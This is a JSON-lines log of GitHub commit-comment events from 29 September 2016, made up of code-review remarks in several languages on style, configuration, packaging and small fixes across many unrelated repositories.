{"id":"4635703024","type":"CommitCommentEvent","actor":{"login":"Hotell"},"repo":{"name":"vire/hlad-ui"},"payload":{"comment":{"id":19220357,"position":17,"line":18,"path":"tsconfig.json","commit_id":"92fd78c2ce78c52171706ceb70e90bf59474812f","created_at":"2016-09-29T08:15:11Z","updated_at":"2016-09-29T08:15:11Z","body":"that's because you already used types for node and you have to add every lib there to have globals automatically work"}},"created_at":"2016-09-29T08:15:11Z"}
{"id":"4635703381","type":"CommitCommentEvent","actor":{"login":"kisoo-han"},"repo":{"name":"kisoo-han/cubrid"},"payload":{"comment":{"id":19220358,"position":null,"line":null,"path":null,"commit_id":"29021fcc88e8c7c945294637aaa541d2c51ef765","created_at":"2016-09-29T08:15:15Z","updated_at":"2016-09-29T08:15:15Z","body":"Change Indentation by 'indent -l120 -lc120'"}},"created_at":"2016-09-29T08:15:15Z"}
{"id":"4635707133","type":"CommitCommentEvent","actor":{"login":"Hotell"},"repo":{"name":"vire/hlad-ui"},"payload":{"comment":{"id":19220366,"position":17,"line":18,"path":"tsconfig.json","commit_id":"92fd78c2ce78c52171706ceb70e90bf59474812f","created_at":"2016-09-29T08:16:05Z","updated_at":"2016-09-29T08:16:05Z","body":"anyway I've solution for you my apprentice :D\r\n\r\nremove that `types` thingy and instead \r\n\r\n```\r\n\"typeRoots\": [\r\n      \"./node_modules/@types\"\r\n    ]\r\n```"}},"created_at":"2016-09-29T08:16:05Z"}
{"id":"4635712875","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19220386,"position":1,"line":1,"path":"a12","commit_id":"d441d19e977d491f23ec5bc0611ecc10b027d16f","created_at":"2016-09-29T08:17:19Z","updated_at":"2016-09-29T08:17:19Z","body":"sasdas"}},"created_at":"2016-09-29T08:17:19Z"}
{"id":"4635713172","type":"CommitCommentEvent","actor":{"login":"d-koppenhagen"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19220387,"position":null,"line":null,"path":null,"commit_id":"ee2ccbcf26da873e33a32cbb8414718d8c1791b9","created_at":"2016-09-29T08:17:23Z","updated_at":"2016-09-29T08:17:23Z","body":"@JohannesHoppe Naja das Problem ist, dass wir das ja bei ganz vielen Komponenten schreiben müssen, nicht nur bei einer. Außerdem kann es ja sein, dass die Komponenten mal irgendwann vom Nutzer in einem anderen Projekt wieder verwendet wird."}},"created_at":"2016-09-29T08:17:23Z"}
{"id":"4635714507","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19220390,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T08:17:42Z","updated_at":"2016-09-29T08:17:42Z","body":"哦，那个是Emacs的buffer区的东西，我不小心一起给复制下来了Orz 😂 "}},"created_at":"2016-09-29T08:17:42Z"}
{"id":"4635715863","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"yura-kit/python-courses"},"payload":{"comment":{"id":19220391,"position":1,"line":1,"path":"problem_set2/Home_Work_warm_up2.py","commit_id":"4573ccef58682c27cd6b189ca7eeaa1fa42f652d","created_at":"2016-09-29T08:18:01Z","updated_at":"2016-09-29T08:18:01Z","body":"looks good to me"}},"created_at":"2016-09-29T08:18:01Z"}
{"id":"4635717343","type":"CommitCommentEvent","actor":{"login":"dlozano"},"repo":{"name":"am-kantox/workflow-join"},"payload":{"comment":{"id":19220393,"position":29,"line":29,"path":"lib/workflow/join/simple/pending_transitions.rb","commit_id":"0f867d7f5076916c6812027c14d94d755ff779b2","created_at":"2016-09-29T08:18:21Z","updated_at":"2016-09-29T08:18:21Z","body":"Should we add something to the log? Or the transition will usually fail?"}},"created_at":"2016-09-29T08:18:21Z"}
{"id":"4635719404","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"yura-kit/python-courses"},"payload":{"comment":{"id":19220397,"position":3,"line":3,"path":"problem_set2/Home_Work_warm_up2.py","commit_id":"4573ccef58682c27cd6b189ca7eeaa1fa42f652d","created_at":"2016-09-29T08:18:49Z","updated_at":"2016-09-29T08:18:49Z","body":"it's better not to define global variable. Define it inside function as it not used anywhere else"}},"created_at":"2016-09-29T08:18:49Z"}
{"id":"4635721497","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19220399,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T08:19:18Z","updated_at":"2016-09-29T08:19:18Z","body":"上课ing\r\n抽空看下GitHub\r\n\r\nDSL系统你看到了吗，多么的一颗赛艇啊。到时候再弄个编译器。直接自动链接dependencies，自动打包，多方便啊。\r\n打包的时候顺便支持一下ProGard内置JRE，Perfect。。。"}},"created_at":"2016-09-29T08:19:18Z"}
{"id":"4635724629","type":"CommitCommentEvent","actor":{"login":"oehme"},"repo":{"name":"eclipse/buildship"},"payload":{"comment":{"id":19220405,"position":5,"line":17,"path":"org.eclipse.buildship.core.test/src/main/groovy/org/eclipse/buildship/core/workspace/internal/ClasspathPersistenceTest.groovy","commit_id":"2ac950fa2dc362c7a3171772bbc40a03b90fac0d","created_at":"2016-09-29T08:20:00Z","updated_at":"2016-09-29T08:20:00Z","body":"We delete all projects in the cleanup block already."}},"created_at":"2016-09-29T08:20:00Z"}
{"id":"4635730475","type":"CommitCommentEvent","actor":{"login":"oehme"},"repo":{"name":"eclipse/buildship"},"payload":{"comment":{"id":19220416,"position":6,"line":18,"path":"org.eclipse.buildship.core.test/src/main/groovy/org/eclipse/buildship/core/workspace/internal/ClasspathPersistenceTest.groovy","commit_id":"2ac950fa2dc362c7a3171772bbc40a03b90fac0d","created_at":"2016-09-29T08:21:14Z","updated_at":"2016-09-29T08:21:14Z","body":"What is the rationale behind this change? Each of the test cases will re-create the state location as part of the initial project import."}},"created_at":"2016-09-29T08:21:14Z"}
{"id":"4635736703","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19220425,"position":30,"line":51,"path":"app/view/twig/_base/_page.twig","commit_id":"f2596fe697c9e2af551a81e6d9d19f05e014b5af","created_at":"2016-09-29T08:22:34Z","updated_at":"2016-09-29T08:22:34Z","body":"HAHAHAHAHA! :+1:  :+1:  :+1:  :+1:  :+1:  :+1:  :+1:  :+1:  :+1:  :+1:  :+1:  :+1:  :+1: \r\n\r\nMate … I've said it so many times already, but I love working with you! That block of code my the final straw that started the branch I am on now!"}},"created_at":"2016-09-29T08:22:34Z"}
{"id":"4635740335","type":"CommitCommentEvent","actor":{"login":"shrimp2t"},"repo":{"name":"FameThemes/onepress"},"payload":{"comment":{"id":19220433,"position":null,"line":null,"path":null,"commit_id":"c15a5508edc5e6e2d27e844382a3d7ebc3f516b3","created_at":"2016-09-29T08:23:22Z","updated_at":"2016-09-29T08:23:22Z","body":"fixed #144 "}},"created_at":"2016-09-29T08:23:22Z"}
{"id":"4635740456","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19220434,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T08:23:23Z","updated_at":"2016-09-29T08:23:23Z","body":"\r\n![](https://assets-cdn.github.com/images/icons/emoji/unicode/1f602.png)\r\n看了，并没完全看懂，下班先。\r\n"}},"created_at":"2016-09-29T08:23:23Z"}
{"id":"4635753210","type":"CommitCommentEvent","actor":{"login":"BigAlInTheHouse"},"repo":{"name":"octocat/Hello-World"},"payload":{"comment":{"id":19220455,"position":null,"line":null,"path":null,"commit_id":"b3cbd5bbd7e81436d2eee04537ea2b4c0cad4cdf","created_at":"2016-09-29T08:25:55Z","updated_at":"2016-09-29T08:25:55Z","body":"CONTRIBUTING.md"}},"created_at":"2016-09-29T08:25:55Z"}
{"id":"4635754976","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"yura-kit/python-courses"},"payload":{"comment":{"id":19220459,"position":3,"line":3,"path":"problem_set2/Home_Work_Hangman.py","commit_id":"4573ccef58682c27cd6b189ca7eeaa1fa42f652d","created_at":"2016-09-29T08:26:19Z","updated_at":"2016-09-29T08:26:19Z","body":"don't use global variables unless absolutely necessary. This could be defined local inside function"}},"created_at":"2016-09-29T08:26:19Z"}
{"id":"4635755449","type":"CommitCommentEvent","actor":{"login":"albertdahlin"},"repo":{"name":"webbhuset/features"},"payload":{"comment":{"id":19220460,"position":93,"line":220,"path":"app/code/community/Webbhuset/Features/Model/Sitemap.php","commit_id":"2c175fe9861e8edf8cabea7f1439e98301b4e3bc","created_at":"2016-09-29T08:26:26Z","updated_at":"2016-09-29T08:26:26Z","body":"Indentering"}},"created_at":"2016-09-29T08:26:26Z"}
{"id":"4635756357","type":"CommitCommentEvent","actor":{"login":"eladraz"},"repo":{"name":"jpirko/linux_mlxsw"},"payload":{"comment":{"id":19220464,"position":null,"line":null,"path":null,"commit_id":"b3e5791a59914c596cc3d85f3cc2e0d66f10762e","created_at":"2016-09-29T08:26:37Z","updated_at":"2016-09-29T08:26:37Z","body":"Jiri, i'm adding another line to this patch. When the port is removed. We need to set mlxsw_sx->ports[local_port] = NULL; \r\n(Otherwise we will access invalid memory)"}},"created_at":"2016-09-29T08:26:37Z"}
{"id":"4635758099","type":"CommitCommentEvent","actor":{"login":"NeverSinkDev"},"repo":{"name":"NeverSinkDev/NeverSink-Filter"},"payload":{"comment":{"id":19220469,"position":null,"line":null,"path":null,"commit_id":"05e4623ce5ae2a1f3ce0eae642d42e7d2de2c1f7","created_at":"2016-09-29T08:26:59Z","updated_at":"2016-09-29T08:26:59Z","body":"You're welcome. That being said, the name's gonna change once more:\r\n\r\nfrom NeverSink's filter - REGULAR to NeverSink's REGULAR filter.\r\n\r\nReason: It's hard to find the propper filter in the dropdown box ingame, since the names are getting cut"}},"created_at":"2016-09-29T08:26:59Z"}
{"id":"4635758595","type":"CommitCommentEvent","actor":{"login":"DexterInd"},"repo":{"name":"DexterInd/Raspbian_For_Robots"},"payload":{"comment":{"id":19220470,"position":null,"line":null,"path":null,"commit_id":"feef08aa013223a1eed26219420eca7c1b887702","created_at":"2016-09-29T08:27:06Z","updated_at":"2016-09-29T08:27:06Z","body":"Got it."}},"created_at":"2016-09-29T08:27:06Z"}
{"id":"4635760086","type":"CommitCommentEvent","actor":{"login":"ILykkPonies"},"repo":{"name":"burlingtondanes/nicholassquartecchia-website"},"payload":{"comment":{"id":19220475,"position":null,"line":null,"path":null,"commit_id":"b422ced96667e5d5e7baf58f13d1de55e04f1351","created_at":"2016-09-29T08:27:25Z","updated_at":"2016-09-29T08:27:25Z","body":"Veri nais"}},"created_at":"2016-09-29T08:27:25Z"}
{"id":"4635760622","type":"CommitCommentEvent","actor":{"login":"albertdahlin"},"repo":{"name":"webbhuset/features"},"payload":{"comment":{"id":19220477,"position":81,"line":208,"path":"app/code/community/Webbhuset/Features/Model/Sitemap.php","commit_id":"2c175fe9861e8edf8cabea7f1439e98301b4e3bc","created_at":"2016-09-29T08:27:32Z","updated_at":"2016-09-29T08:27:32Z","body":"Dessa två rader tillför inget. Du kan ju använda `$entityPage` direkt i foreach-loopen."}},"created_at":"2016-09-29T08:27:32Z"}
{"id":"4635763781","type":"CommitCommentEvent","actor":{"login":"consoleplog"},"repo":{"name":"consoleplog/express"},"payload":{"comment":{"id":19220482,"position":null,"line":null,"path":null,"commit_id":"bbd6c8824409d9d59fc2f9f8993dc2205e5448b0","created_at":"2016-09-29T08:28:12Z","updated_at":"2016-09-29T08:28:12Z","body":"router"}},"created_at":"2016-09-29T08:28:12Z"}
{"id":"4635770110","type":"CommitCommentEvent","actor":{"login":"pasmax2"},"repo":{"name":"pasmax2/miroir"},"payload":{"comment":{"id":19220494,"position":1,"line":1,"path":"README.md","commit_id":"2166a3d18055187e8d88963e437f58c1835e97e5","created_at":"2016-09-29T08:29:34Z","updated_at":"2016-09-29T08:29:34Z","body":"test"}},"created_at":"2016-09-29T08:29:34Z"}
{"id":"4635773778","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"yura-kit/python-courses"},"payload":{"comment":{"id":19220501,"position":1,"line":1,"path":"problem_set2/Home_Work_Hangman.py","commit_id":"4573ccef58682c27cd6b189ca7eeaa1fa42f652d","created_at":"2016-09-29T08:30:20Z","updated_at":"2016-09-29T08:30:20Z","body":"looks good to me"}},"created_at":"2016-09-29T08:30:20Z"}
{"id":"4635776270","type":"CommitCommentEvent","actor":{"login":"kekkokk"},"repo":{"name":"kekkokk/licode"},"payload":{"comment":{"id":19220510,"position":null,"line":null,"path":null,"commit_id":"6484a297abf86fdd2c1abb854058c202f162cf6f","created_at":"2016-09-29T08:30:53Z","updated_at":"2016-09-29T08:30:53Z","body":"Description: \r\nI used the original implementation of a/v sync of licode until i get 2 rtcp packets for audio and 2 rtcp packets for video. \r\nThese control packets are stored in a vector and are dropped by the RtpToNtpMs when they became useless.\r\nThen I recalculate the ntptime (absolute time) for each rtp packet and then I finally calculate the offset. If this offset is <0 I sum it to the other stream timestamp ( previously changing timebase).\r\n\r\n "}},"created_at":"2016-09-29T08:30:53Z"}
{"id":"4635780421","type":"CommitCommentEvent","actor":{"login":"Kycko"},"repo":{"name":"kasramp/UbuntuIndicatorWeather"},"payload":{"comment":{"id":19220518,"position":null,"line":null,"path":null,"commit_id":"70bcd98c77a3b09afb0c7c1d2c5946a4968eb99f","created_at":"2016-09-29T08:31:43Z","updated_at":"2016-09-29T08:31:43Z","body":"@kasramp as I know you must not use one package version twice (in your example it's **0.7ubuntu**).\r\nGood practice is: **0.7-0ubuntu1**, where:\r\n- 0.7 is a program's version\r\n- 0 is **Debian** package version\r\n- ubuntu1 is **Ubuntu** package version\r\n\r\nSo, for example, when you make a new **release**, it's number must be **0.7-0ubuntu1**. Then you decide to make some changes in packaging instructions, and next package number must be **0.7-0ubuntu2**, then **0.7-0ubuntu3** etc."}},"created_at":"2016-09-29T08:31:43Z"}
{"id":"4635782353","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19220522,"position":null,"line":null,"path":null,"commit_id":"58ae1901a5a3f4fd9fbda0efe3e87f8a483a4cda","created_at":"2016-09-29T08:32:08Z","updated_at":"2016-09-29T08:32:08Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1065)"}},"created_at":"2016-09-29T08:32:08Z"}
{"id":"4635784265","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19220530,"position":1,"line":1,"path":"333333","commit_id":"58ae1901a5a3f4fd9fbda0efe3e87f8a483a4cda","created_at":"2016-09-29T08:32:32Z","updated_at":"2016-09-29T08:32:32Z","body":"фуа"}},"created_at":"2016-09-29T08:32:32Z"}
{"id":"4635787613","type":"CommitCommentEvent","actor":{"login":"roc"},"repo":{"name":"mucsi96/nightwatch-cucumber"},"payload":{"comment":{"id":19220536,"position":null,"line":null,"path":null,"commit_id":"dbfbce2ffe51002889850bbb6a108f7d459deaad","created_at":"2016-09-29T08:33:19Z","updated_at":"2016-09-29T08:33:19Z","body":"### 🙏  Yes! 🙏 "}},"created_at":"2016-09-29T08:33:19Z"}
{"id":"4635793599","type":"CommitCommentEvent","actor":{"login":"hughsando"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19220548,"position":null,"line":null,"path":null,"commit_id":"57b67ad10d728ba030d3ca6147f7f3b2da3a3eb3","created_at":"2016-09-29T08:34:35Z","updated_at":"2016-09-29T08:34:35Z","body":"Yes, it is satisfying when you can go \"The type of TCast for interfaces is wrong\", and you have exactly one line for the type of TCast on interfaces.  Before, you had to infer backwards, which was very scary."}},"created_at":"2016-09-29T08:34:35Z"}
{"id":"4635794936","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/prde"},"payload":{"comment":{"id":19220550,"position":null,"line":null,"path":null,"commit_id":"db06632d830b3d4ffd5336f292a57a59bf85a279","created_at":"2016-09-29T08:34:52Z","updated_at":"2016-09-29T08:34:52Z","body":"[R/do_magic.R:6:1:](https://github.com/richelbilderbeek/prde/blob/db06632d830b3d4ffd5336f292a57a59bf85a279/R/do_magic.R#L6) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/do_magic.R:10:7:](https://github.com/richelbilderbeek/prde/blob/db06632d830b3d4ffd5336f292a57a59bf85a279/R/do_magic.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​  out = x * 2;\n      ^\n```\n[R/do_magic.R:11:7:](https://github.com/richelbilderbeek/prde/blob/db06632d830b3d4ffd5336f292a57a59bf85a279/R/do_magic.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​  out = replace(out, out == 84, 42);\n      ^\n```"}},"created_at":"2016-09-29T08:34:52Z"}
{"id":"4635798330","type":"CommitCommentEvent","actor":{"login":"uaandrei"},"repo":{"name":"uaandrei/d4232ffg"},"payload":{"comment":{"id":19220562,"position":null,"line":null,"path":null,"commit_id":"46a88483427297a950acd71d8f98dc36ddc20196","created_at":"2016-09-29T08:35:35Z","updated_at":"2016-09-29T08:35:35Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create domain model, repository, domain model validator for Activity](https://trello.com/c/LBCSCKtp/9-create-domain-model-repository-domain-model-validator-for-activity)"}},"created_at":"2016-09-29T08:35:35Z"}
{"id":"4635806612","type":"CommitCommentEvent","actor":{"login":"guoren83"},"repo":{"name":"c-sky/addons-linux"},"payload":{"comment":{"id":19220572,"position":null,"line":null,"path":null,"commit_id":"57e9236b3c9ab5b34053f82f98f0390578d84780","created_at":"2016-09-29T08:37:21Z","updated_at":"2016-09-29T08:37:21Z","body":"coding convention? "}},"created_at":"2016-09-29T08:37:21Z"}
{"id":"4635807270","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19220574,"position":null,"line":null,"path":null,"commit_id":"84ecb88651dad3abd5c9450b4fdcd6ac2cb53431","created_at":"2016-09-29T08:37:29Z","updated_at":"2016-09-29T08:37:29Z","body":"Yes : and the actual solution (2.51) are a little broken actually : reset to null/\"\" always even if default is set or if attribute is used  ('slider_no_action' system) => I think adding a 'resetTo' option in javascript function\r\n\r\nBUT : before you have 5 times the same js / and slider_custom_handle don't work in FireFox. Just for some example.\r\n\r\nPS :actually color of slider-handle is taken from bg-pimary : this allow to update color only updating bootstrap.css"}},"created_at":"2016-09-29T08:37:29Z"}
{"id":"4635808366","type":"CommitCommentEvent","actor":{"login":"bornhaeusser"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19220575,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-29T08:37:43Z","updated_at":"2016-09-29T08:37:43Z","body":"<img width=\"550\" alt=\"bildschirmfoto 2016-09-29 um 10 37 09\" src=\"https://cloud.githubusercontent.com/assets/6609040/18946784/bb8b2eb4-8630-11e6-962f-ae2058c1b59c.png\">\r\n"}},"created_at":"2016-09-29T08:37:43Z"}
{"id":"4635809544","type":"CommitCommentEvent","actor":{"login":"BadChoice"},"repo":{"name":"ConnectCorp/RVCalendarWeekView"},"payload":{"comment":{"id":19220577,"position":null,"line":null,"path":null,"commit_id":"8887b4c5516533c452361b784ba755664cd84815","created_at":"2016-09-29T08:37:58Z","updated_at":"2016-09-29T08:37:58Z","body":"ok found it, jus changed it to the ```-(void)setShortPress:(BOOL)shortPress``` so the constructor gets clean and without duplicated code\r\n\r\nI just merged your branch into mine so I can keep adding things ;)"}},"created_at":"2016-09-29T08:37:58Z"}
{"id":"4635813782","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19220584,"position":null,"line":null,"path":null,"commit_id":"ae2960e51ab5952215e53c163604b79114c18be3","created_at":"2016-09-29T08:38:53Z","updated_at":"2016-09-29T08:38:53Z","body":"Moar :heart: :+1: "}},"created_at":"2016-09-29T08:38:53Z"}
{"id":"4635818403","type":"CommitCommentEvent","actor":{"login":"atscream02"},"repo":{"name":"huenato/iBlueIt"},"payload":{"comment":{"id":19220590,"position":null,"line":null,"path":null,"commit_id":"afa893971ac565cfd50e4d2c418cdc7f71d3c7ed","created_at":"2016-09-29T08:39:53Z","updated_at":"2016-09-29T08:39:53Z","body":"sad T_T, but how i can find that addon."}},"created_at":"2016-09-29T08:39:53Z"}
{"id":"4635820742","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19220596,"position":null,"line":null,"path":null,"commit_id":"84ecb88651dad3abd5c9450b4fdcd6ac2cb53431","created_at":"2016-09-29T08:40:21Z","updated_at":"2016-09-29T08:40:21Z","body":"great to know you're working on that. \r\nIf I remember well, the original slider in 2.06 was your code. "}},"created_at":"2016-09-29T08:40:21Z"}
{"id":"4635822517","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19220599,"position":null,"line":null,"path":null,"commit_id":"84ecb88651dad3abd5c9450b4fdcd6ac2cb53431","created_at":"2016-09-29T08:40:45Z","updated_at":"2016-09-29T08:40:45Z","body":"Partially"}},"created_at":"2016-09-29T08:40:45Z"}
{"id":"4635822756","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19220600,"position":17,"line":57,"path":"src/Provider/FilesystemServiceProvider.php","commit_id":"914c6aa6fea4c861329e72326b4fab7b3ec6e913","created_at":"2016-09-29T08:40:48Z","updated_at":"2016-09-29T08:40:48Z","body":"What about `'web'` ?"}},"created_at":"2016-09-29T08:40:48Z"}
{"id":"4635825114","type":"CommitCommentEvent","actor":{"login":"Diman3589"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19220605,"position":25,"line":24,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T08:41:17Z","updated_at":"2016-09-29T08:41:17Z","body":"Тогда это не будет удовлетворять условию задания"}},"created_at":"2016-09-29T08:41:17Z"}
{"id":"4635825968","type":"CommitCommentEvent","actor":{"login":"albertdahlin"},"repo":{"name":"webbhuset/features"},"payload":{"comment":{"id":19220607,"position":79,"line":206,"path":"app/code/community/Webbhuset/Features/Model/Sitemap.php","commit_id":"2c175fe9861e8edf8cabea7f1439e98301b4e3bc","created_at":"2016-09-29T08:41:28Z","updated_at":"2016-09-29T08:41:28Z","body":"En liten kommentar om namnen på variabler / funktioner.\r\n\r\n`$entityPage` låter som en entitet. Det är ju i realiteten en array av produkter, eller items. Då borde variabeln heta products, items eller något annat i plural för att förtydliga att det är flera och den går att loopa igenom.\r\n\r\n`$collection->loadNextEntities($page)`. Funktioner som returnerar saker bör heta getXXX för tydlighetens skull, något i stil med getNextEntitiesPage. I Magento finns ju `load()` som funktion på collection-object. Den laddar objektet men returnerar objektet själv ($this). `loadNextEntities` skulle lätt kunna missförstås att fungera som `load` gör."}},"created_at":"2016-09-29T08:41:28Z"}
{"id":"4635826880","type":"CommitCommentEvent","actor":{"login":"Jagged"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19220608,"position":null,"line":null,"path":null,"commit_id":"b5c4981bdd732dd7bfe336a25f1b0db0688f4795","created_at":"2016-09-29T08:41:39Z","updated_at":"2016-09-29T08:41:39Z","body":"What do you think of the feel of the new Match and Switch?  Your idea of reducing the Tn generic parameters made it possible to know when the last one had been filled and so we could just return the resulting value.\r\n\r\nTaking that further, having xx.Match(this).Match(that) start directly off the OneOf means the initial Match actually is involved in a match, not just switching modes.  And as a bonus it gives us the TResult.\r\n\r\nI'm tempted to create a Match(this,that,...Tn) for the use-case when we want to quickly and efficiently match all types, and have Match(this).Match(that).Otherwise(default) for when matching some of the types.  It comes down to personal choice.\r\n\r\nThoughts?  Any other ideas?"}},"created_at":"2016-09-29T08:41:39Z"}
{"id":"4635828298","type":"CommitCommentEvent","actor":{"login":"GawainLynch"},"repo":{"name":"bolt/bolt"},"payload":{"comment":{"id":19220610,"position":null,"line":null,"path":null,"commit_id":"914c6aa6fea4c861329e72326b4fab7b3ec6e913","created_at":"2016-09-29T08:41:56Z","updated_at":"2016-09-29T08:41:56Z","body":"OK … I see where this is, and is going, and :+1: "}},"created_at":"2016-09-29T08:41:56Z"}
{"id":"4635828820","type":"CommitCommentEvent","actor":{"login":"tombaeyens"},"repo":{"name":"effektif/effektif"},"payload":{"comment":{"id":19220611,"position":null,"line":null,"path":null,"commit_id":"deaeef9c09c867559601bf78e77a086d736ce5e0","created_at":"2016-09-29T08:42:03Z","updated_at":"2016-09-29T08:42:03Z","body":"Our benefit of the open source project was too low to justify the extra effort that resulted from splitting our product in an open source part and a product part."}},"created_at":"2016-09-29T08:42:03Z"}
{"id":"4635830386","type":"CommitCommentEvent","actor":{"login":"visualfanatic"},"repo":{"name":"froala/wysiwyg-editor-php-sdk"},"payload":{"comment":{"id":19220615,"position":5,"line":62,"path":"lib/image.php","commit_id":"adbf97a527ab754deaed08ba8d6b2300695f738d","created_at":"2016-09-29T08:42:23Z","updated_at":"2016-09-29T08:42:23Z","body":"`list` is a reserved PHP keyword, please revert that commit.\r\nhttp://php.net/manual/en/reserved.keywords.php"}},"created_at":"2016-09-29T08:42:23Z"}
{"id":"4635832479","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19220621,"position":1,"line":1,"path":"333333","commit_id":"58ae1901a5a3f4fd9fbda0efe3e87f8a483a4cda","created_at":"2016-09-29T08:42:50Z","updated_at":"2016-09-29T08:42:50Z","body":"дргшпнге"}},"created_at":"2016-09-29T08:42:50Z"}
{"id":"4635841513","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"tobi5648/PersonPolymorfi"},"payload":{"comment":{"id":19220628,"position":30,"line":30,"path":"PersonHierarchy.Tests/CourseTests.cs","commit_id":"4cf465154268867903196c6307f0cfadb5154059","created_at":"2016-09-29T08:44:42Z","updated_at":"2016-09-29T08:44:42Z","body":"Prøv at asserte med equal."}},"created_at":"2016-09-29T08:44:42Z"}
{"id":"4635845251","type":"CommitCommentEvent","actor":{"login":"albertdahlin"},"repo":{"name":"webbhuset/features"},"payload":{"comment":{"id":19220635,"position":78,"line":205,"path":"app/code/community/Webbhuset/Features/Model/Sitemap.php","commit_id":"2c175fe9861e8edf8cabea7f1439e98301b4e3bc","created_at":"2016-09-29T08:45:29Z","updated_at":"2016-09-29T08:45:29Z","body":"Denna variabel borde vara en klass-property i ditt `$collection` objekt. På samma sätt som du gör med `fileNumber` i denna klass.\r\n\r\nDetta eftersom funktionen heter `loadNextEntities`. Den borde ju alltid ge nästa sida med entities. I detta fall kommer den ju inte göra det om jag skickar in samma `$page` flera gånger."}},"created_at":"2016-09-29T08:45:29Z"}
{"id":"4635846045","type":"CommitCommentEvent","actor":{"login":"JohannesHoppe"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19220636,"position":null,"line":null,"path":null,"commit_id":"ee2ccbcf26da873e33a32cbb8414718d8c1791b9","created_at":"2016-09-29T08:45:38Z","updated_at":"2016-09-29T08:45:38Z","body":"Genau deswegen machen wir ja eine ganz konkrete Implemtierung, die weiter entwickelt wird.\r\nWir schreiben ja auch nicht rein:\r\n\r\n```\r\n@Component({\r\n   providers: []\r\n})\r\n```\r\n... nur damit der Leser das in einem anderen Projekt wieder verwenden kann.\r\n\r\nKomponenten ohne Selector sind absolut ok, ich kann sie ja immer noch über\r\n* Router-Outlet oder z.B.\r\n* [ComponentFactoryResolver](http://blog.thecodecampus.de/angular-2-dynamically-render-components/)\r\nladen. Über die View + Selector ist nur eine Option."}},"created_at":"2016-09-29T08:45:38Z"}
{"id":"4635846149","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"tobi5648/PersonPolymorfi"},"payload":{"comment":{"id":19220637,"position":1,"line":1,"path":"PersonHierarchy.Tests/CourseTests.cs","commit_id":"4cf465154268867903196c6307f0cfadb5154059","created_at":"2016-09-29T08:45:40Z","updated_at":"2016-09-29T08:45:40Z","body":"Det er bedre kodeskik, at dine usings er inde i namespacet."}},"created_at":"2016-09-29T08:45:40Z"}
{"id":"4635849562","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-multi-choice"},"payload":{"comment":{"id":19220640,"position":44,"line":521,"path":"js/multichoice.js","commit_id":"bb091c0efe1d65772387e9a35ff56b8e1efa9a26","created_at":"2016-09-29T08:46:20Z","updated_at":"2016-09-29T08:46:20Z","body":"Who have we reserved all this space for? :-)"}},"created_at":"2016-09-29T08:46:20Z"}
{"id":"4635851584","type":"CommitCommentEvent","actor":{"login":"yukunqiao"},"repo":{"name":"yukunqiao/daily"},"payload":{"comment":{"id":19220645,"position":3,"line":0,"path":"yukunqiao-2016-09-29.md","commit_id":"b56b4cc3e60dbba1e68c45e4dfe8b8015c48cd3e","created_at":"2016-09-29T08:46:46Z","updated_at":"2016-09-29T08:46:46Z","body":"Hdhhshvsh\n"}},"created_at":"2016-09-29T08:46:46Z"}
